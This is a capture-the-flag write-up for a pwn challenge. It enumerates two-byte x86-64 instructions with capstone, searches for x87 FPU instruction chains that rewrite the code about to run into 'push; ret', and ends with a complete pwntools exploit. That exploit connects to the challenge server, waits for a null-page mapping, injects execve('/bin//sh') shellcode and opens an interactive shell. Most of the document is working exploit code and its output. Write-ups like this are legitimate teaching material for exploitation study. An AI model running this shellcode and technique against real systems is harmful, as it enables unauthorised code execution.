Rating:

After several attempts, we found that null page allocation is possible on the server.

So, at first, we thought of "push ss; ret", but unfortunately, segment registers other than fs and gs cannot be pushed on x64. (Of course we also considered “pushfq; ret”, but we couldn't find a way to reduce rflags to below 0x100.)

After the 2 bytes of user code are executed, all the general-purpose registers are restored (they even check rsp using “cmp rsp, rax”), so we thought about how to utilize special registers such as st0, mm0, and xmm0.

```python
"""List every instruction capstone decodes from a two-byte x86-64 prefix.

Each of the 65536 two-byte combinations is followed by NOP padding and
disassembled; every instruction seen before the first ``nop`` is recorded.
The sorted, de-duplicated listing is written to ``asm_list.txt``.
"""
from capstone import CS_ARCH_X86, CS_MODE_64, Cs

# NOP padding placed after the two candidate bytes so the disassembler always
# has enough trailing bytes to finish decoding an instruction.
d = [0x90] * 16

md = Cs(CS_ARCH_X86, CS_MODE_64)

# A set de-duplicates as we go instead of rebuilding list -> set -> list.
seen = set()

for ii in range(256):
    for jj in range(256):
        CODE = bytes([jj, ii]) + bytes(d)

        for (address, size, mnemonic, op_str) in md.disasm_lite(CODE, 0 + 0x200):
            # Reaching the padding means the candidate bytes are used up.
            if mnemonic == "nop":
                break

            seen.add("%s %s" % (mnemonic, op_str))

result = sorted(seen)

# The context manager closes the file even if the write raises.
with open("asm_list.txt", "w") as f:
    f.write("\n".join(result))
```

We tried to list all possible instructions using the capstone disassembler, and we saw some interesting ones.

```
fld1 # set st0 1.00
fadd dword ptr [rdx - 0x70] # dword ptr [rdx - 0x70] always 0x41414141
fsub dword ptr [rdx - 0x70]
fmul st(0), st(0)
fstp xword ptr [rdx] # xword = tbyte
```

Because rdx and rip have the same value, it is possible to modify the code to be executed next with fstp!

Nevertheless, it is difficult to find a combination that sets st0 to the desired value. However, as mentioned earlier, since null page allocation is possible, we only need the self-modification to produce the code "push (small value); retn".

Since it is difficult to use x64 inline assembly in Visual Studio, we wrote code to find the required combination with x86 inline assembly. (It's a bit different, but it's actually doing the same thing.)

```c
#include <stdio.h>
#include <time.h>
#include <windows.h>

// Zero-initialised scratch buffer; main() stores st(0) here with
// FSTP TBYTE PTR and then inspects the individual bytes.
BYTE out_buf[0x100]{};

// Reset the x87 FPU and load 1.0 into st(0), mirroring the "fld1" gadget.
// Declared naked, so the body supplies its own "ret".
__declspec(naked) void __stdcall fpu_start()
{
    __asm
    {
        fninit          // reinitialise the FPU (empty register stack)
        fld1            // st(0) = 1.0
        ret
    }
}

// Add the 32-bit float whose bit pattern is 0x41414141 to st(0).
// Stands in for "fadd dword ptr [rdx - 0x70]" from the write-up, where that
// memory is stated to always hold 0x41414141.
__declspec(naked) void __stdcall fpu_add_reg()
{
    __asm
    {
        push 0x41414141         // place the operand on the stack
        FADD DWORD PTR[ESP]     // st(0) += float at [esp]
        pop eax                 // discard the operand (overwrites eax)
        ret
    }
}
// Subtract the 32-bit float whose bit pattern is 0x41414141 from st(0).
// Stands in for "fsub dword ptr [rdx - 0x70]" from the write-up.
__declspec(naked) void __stdcall fpu_sub_reg()
{
    __asm
    {
        push 0x41414141         // place the operand on the stack
        FSUB DWORD PTR[ESP]     // st(0) -= float at [esp]
        pop eax                 // discard the operand (overwrites eax)
        ret
    }
}
// Square st(0) in place, mirroring the "fmul st(0), st(0)" gadget.
__declspec(naked) void __stdcall fpu_mul_self()
{
    __asm
    {
        fmul st(0), st(0)       // st(0) = st(0) * st(0)
        ret
    }
}

// Randomised search for a gadget chain.
//
// Each attempt starts from st(0) = 1.0, applies 15 randomly chosen FPU
// operations, stores st(0) as a 10-byte value into out_buf and checks whether
// bytes 2 and 4 are 0x6a and 0xc3. Every matching attempt is printed as a
// list of escaped two-byte opcode strings.
int main()
{
    int cases[0x100]{};     // random pick (0..9) made at each step of the attempt
    srand(time(0));

    for (int attempt = 0; attempt < 100000; ++attempt)
    {
        fpu_start();

        // Picks 0-4 add, 5-8 square, 9 subtract.
        for (int step = 0; step < 15; ++step)
        {
            const int pick = rand() % 10;
            cases[step] = pick;

            if (pick >= 0 && pick <= 4)
                fpu_add_reg();
            else if (pick >= 5 && pick <= 8)
                fpu_mul_self();
            else if (pick == 9)
                fpu_sub_reg();
        }

        // Dump st(0) into out_buf in its 10-byte TBYTE form.
        __asm
        {
            mov eax, offset[out_buf]
            FSTP TBYTE PTR[eax]
        }

        // Only 0x6a at offset 2 and 0xc3 at offset 4 are accepted
        // (0xc2 at offset 4 is intentionally not accepted).
        const bool push_matches = (out_buf[2] == 0x6a);
        const bool ret_matches = (out_buf[4] == 0xc3);
        if (!push_matches || !ret_matches)
            continue;

        printf("[");
        printf("\"\\xd9\\xe8\", "); // fld1

        for (int step = 0; step < 15; ++step)
        {
            switch (cases[step])
            {
            case 0:
            case 1:
            case 2:
            case 3:
            case 4:
                printf("\"\\xd8\\x42\", ");     // add step
                break;
            case 5:
            case 6:
            case 7:
            case 8:
                printf("\"\\xdc\\xc8\", ");     // square step
                break;
            default:
                printf("\"\\xd8\\x62\", ");     // subtract step
                break;
            }
        }

        // fstp tbyte ptr ds:[rdx], st0
        printf("\"\\xdb\\x3a\" ");
        printf("]");
        printf("\n");
    }
}
```

The result is ["\xd9\xe8", "\xd8\x42", "\xdc\xc8", "\xd8\x42", "\xd8\x42", "\xd8\x42", "\xdc\xc8", "\xd8\x62", "\xdc\xc8", "\xd8\x42", "\xd8\x42", "\xd8\x42", "\xd8\x42", "\xdc\xc8", "\xd8\x42", "\xd8\x42", "\xdb\x3a"].

Final exploit Code:

```python
#-*- coding: utf-8 -*-
from pwn import *
from ctypes import *

# Load libc through ctypes so its wide-character conversion routines can be
# called from Python, and select a UTF-8 locale for them (category 0 is
# presumably LC_CTYPE on glibc -- confirm against <locale.h>).
lib = CDLL("/lib/x86_64-linux-gnu/libc.so.6")
lib.setlocale(0, "en_US.UTF-8")

# Connection to the challenge service; swap in the line below for a local run.
p = remote("pwnable.org", 31323)
# p = process("./original")


def go(x):
    """Wait for a prompt ending in "?\\n", then send *x* followed by a newline."""
    return p.sendlineafter("?\n", x)

def decode(array):
    """Run libc ``mbstowcs`` over *array* and return the buffer's ``.value``.

    The output buffer holds four bytes per input element, and the same number
    is passed to ``mbstowcs`` as its limit.

    NOTE(review): ``.value`` stops at the first NUL byte, so the result may be
    shorter than the converted data -- confirm before relying on it.
    """
    capacity = len(array) * 4
    out = create_string_buffer(capacity)
    lib.mbstowcs(out, array, capacity)
    return out.value

def encode(array):
    """Run libc ``wcstombs`` over *array* and return the buffer's ``.value``.

    The output buffer holds four bytes per input element, and the same number
    is passed to ``wcstombs`` as its byte limit. The result is whatever
    ``.value`` yields, i.e. the bytes up to the first NUL.

    NOTE(review): presumably *array* is a raw byte string that libc reads as
    wide characters, so the conversion depends on the active locale -- confirm.
    """
    capacity = len(array) * 4
    out = create_string_buffer(capacity)
    lib.wcstombs(out, array, capacity)
    return out.value

# Keep answering the prompt until the service reports that mmap() returned
# address zero, printed either as "(nil)" or as "0x0".
while True:
    go("?")
    p.recvuntil("mmap() at @")
    allocated_addr = p.recvuntil("\n").strip()
    print(allocated_addr)
    if "(nil)" in allocated_addr or allocated_addr == "0x0":
        break

# x86-64 Linux shellcode: execve("/bin//sh", NULL, NULL).
my_shellcode = (
    "\x6A\x00\x5A"                              # push 0; pop rdx
    "\x6A\x00\x5E"                              # push 0; pop rsi
    "\x6A\x00"                                  # push 0 (string terminator)
    "\x48\xBB\x2F\x62\x69\x6E\x2F\x2F\x73\x68"  # mov rbx, "/bin//sh"
    "\x53"                                      # push rbx
    "\x54\x5F"                                  # push rsp; pop rdi
    "\x6A\x3B\x58"                              # push 0x3b; pop rax
    "\x0F\x05"                                  # syscall
)

# Pad the shellcode with "A" to a fixed 111 bytes.
shellcode = my_shellcode.ljust(111, "A")

# Two-byte instructions, sent one per round, in the order found by the search.
gadgets = [
    "\xd9\xe8",  # fld1
    "\xd8\x42",  # fadd
    "\xdc\xc8",  # fmul st(0), st(0)
    "\xd8\x42",
    "\xd8\x42",
    "\xd8\x42",
    "\xdc\xc8",
    "\xd8\x62",  # fsub
    "\xdc\xc8",
    "\xd8\x42",
    "\xd8\x42",
    "\xd8\x42",
    "\xd8\x42",
    "\xdc\xc8",
    "\xd8\x42",
    "\xd8\x42",
    "\xdb\x3a",  # fstp tbyte ptr [rdx]
]  # \xeb \xfb

# Parts of the payload that are the same in every round.
# NOTE(review): the repeated 10-byte sequence decodes as push rdx / pop
# rax, rbx, rcx, rsi, rdi and "\x54" as push rsp; how the service uses these
# bytes is not visible here -- confirm against the target binary.
payload_head = "A" * 0x5E + "\x52\x58\x52\x5B\x52\x59\x52\x5E\x52\x5F" * (5) + "\x54"
payload_tail = "C" * (256)

for i, gadget in enumerate(gadgets):
    print(i)
    assert len(gadget) <= 2
    go("?")
    pay = "".join((payload_head, shellcode, payload_tail, gadget))
    # Drop the last two bytes of the encoded payload before sending.
    p.send(encode(pay)[:-2])

p.interactive()
```